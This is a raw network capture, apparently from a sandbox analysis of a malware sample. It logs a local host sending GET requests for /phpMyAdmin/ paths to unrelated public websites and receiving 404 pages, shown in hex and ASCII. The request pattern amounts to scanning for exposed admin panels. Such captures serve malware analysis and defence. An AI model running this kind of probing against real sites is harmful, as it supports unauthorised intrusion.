                                                                                                                                                                                                                                                                                                                                                                x-content-security-policy: default-src 'self'; script-src 'self' 'sha256-93ejg12EAT+6aW5hUFXASC0su+RZ+zOjgnJgLqJaLmY=' https://sc-static.net https://www.google-analytics.com https://www.googletagmanager.com https://snap-api.arkoselabs.com/ https://www.google.com/recaptcha/ https://www.google.com/js https://www.gstatic.com/ https://apis.google.com/ https://tr.snapchat.com/config/com/49966cac-c23c-49c7-9ff9-c7f8f6f771ba.js; font-src 'self' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net data:; style-src 'self' 'unsafe-inline' https://snapnet-cdn.storage.googleapis.com *.sc-cdn.net blob:; frame-src 'self' https://iframe.arkoselabs.com https://snap-api.arkoselabs.com https://tr.snapchat.com https://www.google.com/ https://client-api.arkoselabs.com/; connect-src 'self' https://graphql.contentful.com/content/v1/spaces/kp51zybwznx4/environments/master https://snap-api.arkoselabs.com/ https://tr.snapchat.com https://www.snapchat.com https://accounts.snapchat.com https://web-frontend-dot-sc-analytics.appspot.com https://us-central1-gcp.api.snapchat.com https://staging-us-central1-gcp.api.snapchat.com https://www.google-analytics.com https://sentry.sc-prod.net https://cdn.contentful.com/spaces/kp51zybwznx4/ https://accounts.snap.com/ https://web.snapchat.com/ https://gcp.api.snapchat.com https://story.snapchat.com https://aws.api.snapchat.com/snapchat.cdp.cof.CircumstancesService/targetingQuery https://aws.api.snapchat.com/snapchat.ab.exposure_service.ExposureService/BatchUpdateAbExposure https://chat-gold.sc-corp.net; img-src 'self' data: https://ssl.gstatic.com https://www.snapchat.com https://sc-oauth2-client-icons-dev.storage.googleapis.com https://sc-oauth2-client-icons.storage.googleapis.com https://storage.googleapis.com https://www.google-analytics.com https://images.ctfassets.net https://sdk.bitmoji.com; media-src 'self' https://storage.googleapis.com; form-action 'self' https://*.snap.com https://*.snapchat.com https://*.snap-dev.net https://*.sc-corp.net https://localhost:3000; frame-ancestors https://iframe.arkoselabs.com https://profile.softserve-local-prod.snap-dev.net https://preproduction-dot-snap-profile-manager.snapchat.com https://hotfix-dot-snap-profile-manager.snapchat.com https://snap-profile-manager.snapchat.com https://profile-preprod.snapchat.com https://business-preprod.snapchat.com https://profile.snapchat.com https://business.snapchat.com https://enterprise.snap.com;
                                                                                                                                                                                                                                                                                                                                                                x-cloud-trace-context: a468c21a534d8f3e409e7d524b2473dd
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                server: API Gateway
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 664
                                                                                                                                                                                                                                                                                                                                                                via: 1.1 google, 1.1 google
                                                                                                                                                                                                                                                                                                                                                                alt-svc: clear
                                                                                                                                                                                                                                                                                                                                                                strict-transport-security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC664INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6f 72 69 67 69 6e 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 65 2d 69 74 75 6e 65 73 2d 61 70 70 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 2d 69 64 3d 34 34 37 31 38 38 33 37 30 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 26 62
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html lang="en"><head><meta charset="utf-8"><meta name="referrer" content="origin"><meta name="apple-itunes-app" content="app-id=447188370"><title>404 &b


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                167192.168.2.663618178.16.128.181443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC173OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: mobilsam.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC762INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                x-powered-by: PHP/8.1.26
                                                                                                                                                                                                                                                                                                                                                                expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                link: <https://mobilsam.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache-control: public,max-age=3600
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-tag: 106_HTTP.404,106_404,106_URL.1e5f09d904a9efd2fc928c187452329f,106_
                                                                                                                                                                                                                                                                                                                                                                x-litespeed-cache: miss
                                                                                                                                                                                                                                                                                                                                                                transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:10 GMT
                                                                                                                                                                                                                                                                                                                                                                server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                platform: hostinger
                                                                                                                                                                                                                                                                                                                                                                content-security-policy: upgrade-insecure-requests
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC606INData Raw: 31 30 30 30 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 38 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 39 5d 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 65 39 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 10000<!DOCTYPE html>...[if IE 8]><html class="ie8"><![endif]-->...[if IE 9]><html class="ie9"><![endif]-->...[if gt IE 8]>...> <html lang="en-US"> ...<![endif]--><head>... Google tag (gtag.js) --><script async src="https://www.googletagman
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC14994INData Raw: 57 6b 41 75 49 77 58 56 45 33 5a 6d 35 75 52 30 6c 4b 45 66 4b 54 48 64 4c 32 43 33 6b 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 21 2d 2d 20 47 6c 6f 62 61 6c 20 73 69 74 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 20 47 6f 6f 67 6c 65 20 41 6e 61 6c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: WkAuIwXVE3Zm5uR0lKEfKTHdL2C3k" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta name="viewport" content="user-scalable=yes, width=device-width, initial-scale=1.0, maximum-scale=1">... Global site tag (gtag.js) - Google Anal
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 73 2d 73 6d 61 6c 6c 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 73 6d 61 6c 6c 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6d 65 64 69 75 6d 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 6c 61 72 67 65 2d 66 6f 6e 74 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 78 2d 6c 61 72 67 65 2d 66 6f 6e
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: s-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) !important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-fon
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 61 6d 65 22 3e 43 6f 6e 74 61 63 74 20 55 73 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 3c 2f 64 69 76 3e 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 0d 0a 09 09 0d 0a 0d 0a 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 68 65 61 64 65 72 2d 31 2d 77 72 61 70 70 65 72 20 68 65 61 64 65 72 2d 6d 61 69 6e 2d 61 72 65 61 22 3e 09 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 2d 6e 61 76 22 3e 0d 0a 09 3c 61 20 63 6c 61 73 73 3d 22 76 63 65 2d 72 65 73 70 6f 6e 73 69 76 65 2d 6e 61 76 22 20 68 72 65 66 3d 22 23 73 69 64 72 2d 6d 61 69 6e 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 62 61 72 73 22 3e 3c 2f 69 3e 3c 2f 61 3e 0d 0a 3c 2f 64 69
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ame">Contact Us</span></a></li></ul></div></div></div></div><div class="container header-1-wrapper header-main-area"><div class="vce-res-nav"><a class="vce-responsive-nav" href="#sidr-main"><i class="fa fa-bars"></i></a></di
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 74 26 26 28 22 62 65 66 6f 72 65 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 62 65 66 6f 72 65 3a 22 61 66 74 65 72 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 66 74 65 72 3a 22 70 72 65 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 70 72 65 70 65 6e 64 3a 22 61 70 70 65 6e 64 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 61 70 70 65 6e 64 3a 22 72 65 70 6c 61 63 65 2d 63 6f 6e 74 65 6e 74 22 3d 3d 61 3f 72 3d 61 69 5f 66 72 6f 6e 74 2e 69 6e 73 65 72 74 69 6f 6e 5f 72 65 70 6c 61 63 65 5f 63 6f 6e 74 65 6e 74 3a 22 72 65 70 6c 61 63 65 2d 65 6c 65 6d 65 6e 74 22 3d 3d 61 26 26 28 72 3d 61 69 5f 66 72 6f 6e 74
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: t&&("before"==a?r=ai_front.insertion_before:"after"==a?r=ai_front.insertion_after:"prepend"==a?r=ai_front.insertion_prepend:"append"==a?r=ai_front.insertion_append:"replace-content"==a?r=ai_front.insertion_replace_content:"replace-element"==a&&(r=ai_front
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC793INData Raw: 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 7c 7c 22 6c 6f 61 64 69 6e 67 22 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 72 65 61 64 79 53 74 61 74 65 26 26 21 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e 74 2e 64 6f 53 63 72 6f 6c 6c 3f 62 28 29 3a 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 62 29 7d 29 28 66 75 6e 63 74 69 6f 6e 28 29 7b 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 69 5f 70 72 6f 63 65 73 73 5f 72 6f 74 61 74 69 6f 6e 73 28 29 7d 2c 0a 31 30 29 7d 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 31 3b 66 75 6e 63 74 69 6f 6e 20 44 28 29 7b 61 69 5f 70 72 6f 63 65 73 73
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ent.readyState||"loading"!==document.readyState&&!document.documentElement.doScroll?b():document.addEventListener("DOMContentLoaded",b)})(function(){setTimeout(function(){ai_process_rotations()},10)});ai_process_elements_active=!1;function D(){ai_process
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1368INData Raw: 64 37 32 33 0d 0a 31 3d 3d 61 69 5f 74 72 61 63 6b 69 6e 67 5f 66 69 6e 69 73 68 65 64 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 69 63 6b 5f 74 72 61 63 6b 65 72 73 28 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 26 26 61 69 5f 69 6e 73 74 61 6c 6c 5f 63 6c 6f 73 65 5f 62 75 74 74 6f 6e 73 28 64 6f 63 75 6d 65 6e 74 29 7d 2c 35 29 3b 61 69 5f 70 72 6f 63 65 73 73 5f 65 6c 65 6d 65 6e 74 73 5f 61 63 74 69 76 65 3d 21 30 7d 7d 3b 0a 3b 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 28 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 61 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 26 26 6e 75 6c 6c 21
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: d7231==ai_tracking_finished&&ai_install_click_trackers();"function"==typeof ai_install_close_buttons&&ai_install_close_buttons(document)},5);ai_process_elements_active=!0}};;!function(a,b){a(function(){"use strict";function a(a,b){return null!=a&&null!
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC14994INData Raw: 58 6f 6f 6d 7c 48 52 49 33 39 7c 4d 4f 54 2d 7c 41 31 32 36 30 7c 41 31 36 38 30 7c 41 35 35 35 7c 41 38 35 33 7c 41 38 35 35 7c 41 39 35 33 7c 41 39 35 35 7c 41 39 35 36 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 45 4c 45 43 54 52 49 46 59 7c 4d 6f 74 6f 72 6f 6c 61 2e 2a 69 31 7c 69 38 36 37 7c 69 39 34 30 7c 4d 42 32 30 30 7c 4d 42 33 30 30 7c 4d 42 35 30 31 7c 4d 42 35 30 32 7c 4d 42 35 30 38 7c 4d 42 35 31 31 7c 4d 42 35 32 30 7c 4d 42 35 32 35 7c 4d 42 35 32 36 7c 4d 42 36 31 31 7c 4d 42 36 31 32 7c 4d 42 36 33 32 7c 4d 42 38 31 30 7c 4d 42 38 35 35 7c 4d 42 38 36 30 7c 4d 42 38 36 31 7c 4d 42 38 36 35 7c 4d 42 38 37 30 7c 4d 45 35 30 31 7c 4d 45 35 30 32 7c 4d 45 35 31 31 7c 4d 45 35 32 35 7c 4d 45 36 30 30 7c 4d 45 36 33 32 7c 4d 45 37 32 32 7c 4d 45 38 31
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: Xoom|HRI39|MOT-|A1260|A1680|A555|A853|A855|A953|A955|A956|Motorola.*ELECTRIFY|Motorola.*i1|i867|i940|MB200|MB300|MB501|MB502|MB508|MB511|MB520|MB525|MB526|MB611|MB612|MB632|MB810|MB855|MB860|MB861|MB865|MB870|ME501|ME502|ME511|ME525|ME600|ME632|ME722|ME81
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 50 54 31 33 7c 53 47 50 54 31 31 34 7c 53 47 50 54 31 32 31 7c 53 47 50 54 31 32 32 7c 53 47 50 54 31 32 33 7c 53 47 50 54 31 31 31 7c 53 47 50 54 31 31 32 7c 53 47 50 54 31 31 33 7c 53 47 50 54 31 33 31 7c 53 47 50 54 31 33 32 7c 53 47 50 54 31 33 33 7c 53 47 50 54 32 31 31 7c 53 47 50 54 32 31 32 7c 53 47 50 54 32 31 33 7c 53 47 50 33 31 31 7c 53 47 50 33 31 32 7c 53 47 50 33 32 31 7c 45 42 52 44 31 31 30 31 7c 45 42 52 44 31 31 30 32 7c 45 42 52 44 31 32 30 31 7c 53 47 50 33 35 31 7c 53 47 50 33 34 31 7c 53 47 50 35 31 31 7c 53 47 50 35 31 32 7c 53 47 50 35 32 31 7c 53 47 50 35 34 31 7c 53 47 50 35 35 31 7c 53 47 50 36 32 31 7c 53 47 50 36 34 31 7c 53 47 50 36 31 32 7c 53 4f 54 33 31 7c 53 47 50 37 37 31 7c 53 47 50 36 31 31 7c 53 47 50 36 31 32 7c 53
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: PT13|SGPT114|SGPT121|SGPT122|SGPT123|SGPT111|SGPT112|SGPT113|SGPT131|SGPT132|SGPT133|SGPT211|SGPT212|SGPT213|SGP311|SGP312|SGP321|EBRD1101|EBRD1102|EBRD1201|SGP351|SGP341|SGP511|SGP512|SGP521|SGP541|SGP551|SGP621|SGP641|SGP612|SOT31|SGP771|SGP611|SGP612|S
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC16384INData Raw: 5c 2d 73 7c 64 65 76 69 7c 64 69 63 61 7c 64 6d 6f 62 7c 64 6f 28 63 7c 70 29 6f 7c 64 73 28 31 32 7c 5c 2d 64 29 7c 65 6c 28 34 39 7c 61 69 29 7c 65 6d 28 6c 32 7c 75 6c 29 7c 65 72 28 69 63 7c 6b 30 29 7c 65 73 6c 38 7c 65 7a 28 5b 34 2d 37 5d 30 7c 6f 73 7c 77 61 7c 7a 65 29 7c 66 65 74 63 7c 66 6c 79 28 5c 2d 7c 5f 29 7c 67 31 20 75 7c 67 35 36 30 7c 67 65 6e 65 7c 67 66 5c 2d 35 7c 67 5c 2d 6d 6f 7c 67 6f 28 5c 2e 77 7c 6f 64 29 7c 67 72 28 61 64 7c 75 6e 29 7c 68 61 69 65 7c 68 63 69 74 7c 68 64 5c 2d 28 6d 7c 70 7c 74 29 7c 68 65 69 5c 2d 7c 68 69 28 70 74 7c 74 61 29 7c 68 70 28 20 69 7c 69 70 29 7c 68 73 5c 2d 63 7c 68 74 28 63 28 5c 2d 7c 20 7c 5f 7c 61 7c 67 7c 70 7c 73 7c 74 29 7c 74 70 29 7c 68 75 28 61 77 7c 74 63 29 7c 69 5c 2d 28 32 30 7c
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: \-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                168192.168.2.663613172.67.218.172443
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:10 UTC180OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: www.phonandroid.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC821INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:11 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                                                                                                Link: <https://www.phonandroid.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                                                                X-Backend: k8s-prod2-be
                                                                                                                                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=yQRDLwuCZXsMcMOMH6akPJ67grJMWdAshapPU%2BtcvGUbJUcYM2f2kTwh1wPS8euddvLf0Q2sZsdn05987J0nFSFw8qeU7m2d8rFgvUpoRiJmriD6tez2I1cFjmGXmh4oDhRO7ro0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd5e2b9653fe-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC548INData Raw: 37 63 37 62 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 2d 46 52 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 6c 61 73 73 3d 22 6e 6f 2d 6c 61 7a 79 22 3e 0a 09 77 69 6e 64 6f 77 2e 67 6d 5f 63 6d 70 5f 64 65 61 63 74 69 76 61 74 65 64 20 3d 20 74 72 75 65 3b 0a 0a 09 2f 2f 20 66 6f 72 63 69 6e 67 20 64 65 62 75 67 20 66 6f 72 20 61 20 74 69 6d 65 20 3a 0a 09 2f 2f 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 67 65 74 43 6f 6e 73 6f 6c 65 22 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 5b 27 47 54 4d 27 2c 27 63 6f 6e 73 65 6e 74 27 2c 27 41 53 4c 27 2c 27 41 50 49 2d 43 43 4d 27 5d 29 29 3b 0a 09 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7c7b<!doctype html> <html lang="fr-FR"><head><script class="no-lazy">window.gm_cmp_deactivated = true;// forcing debug for a time :// localStorage.setItem("getConsole",JSON.stringify(['GTM','consent','ASL','API-CCM']));window.dataLayer =
                                                                                                                                                                                                                                                                                                                                                                2024-02-05 11:16:11 UTC1369INData Raw: 22 69 64 56 69 64 65 6f 22 3a 20 22 22 2c 0a 09 09 09 22 69 64 41 72 74 69 63 6c 65 22 3a 20 22 22 2c 0a 09 09 09 22 61 75 74 68 6f 72 22 3a 20 22 22 2c 0a 09 09 09 22 65 6e 76 69 72 6f 6e 6e 65 6d 65 6e 74 22 3a 20 22 70 72 6f 64 75 63 74 69 6f 6e 22 2c 0a 09 09 09 22 73 69 74 65 70 61 67 65 22 3a 20 22 70 68 6f 6e 61 6e 64 72 6f 69 64 5f 61 63 74 75 5f 64 69 76 65 72 73 22 2c 0a 09 09 09 22 61 64 73 2e 69 6e 73 65 72 74 6f 72 22 3a 7b 22 6e 6f 64 65 53 65 6c 65 63 74 6f 72 22 3a 22 23 6a 41 72 74 69 63 6c 65 49 6e 73 69 64 65 22 2c 22 65 78 63 6c 75 73 69 6f 6e 4e 6f 64 65 46 69 6c 74 65 72 22 3a 5b 22 2e 67 6d 6d 61 2d 70 72 6f 64 75 63 74 73 22 2c 20 22 2e 67 6d 5f 61 70 70 22 2c 20 22 2e 66 78 2d 74 6f 63 22 2c 20 22 69 6d 67 22 2c 20 22 66 69 67 75
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: "idVideo": "","idArticle": "","author": "","environnement": "production","sitepage": "phonandroid_actu_divers","ads.insertor":{"nodeSelector":"#jArticleInside","exclusionNodeFilter":[".gmma-products", ".gm_app", ".fx-toc", "img", "figu
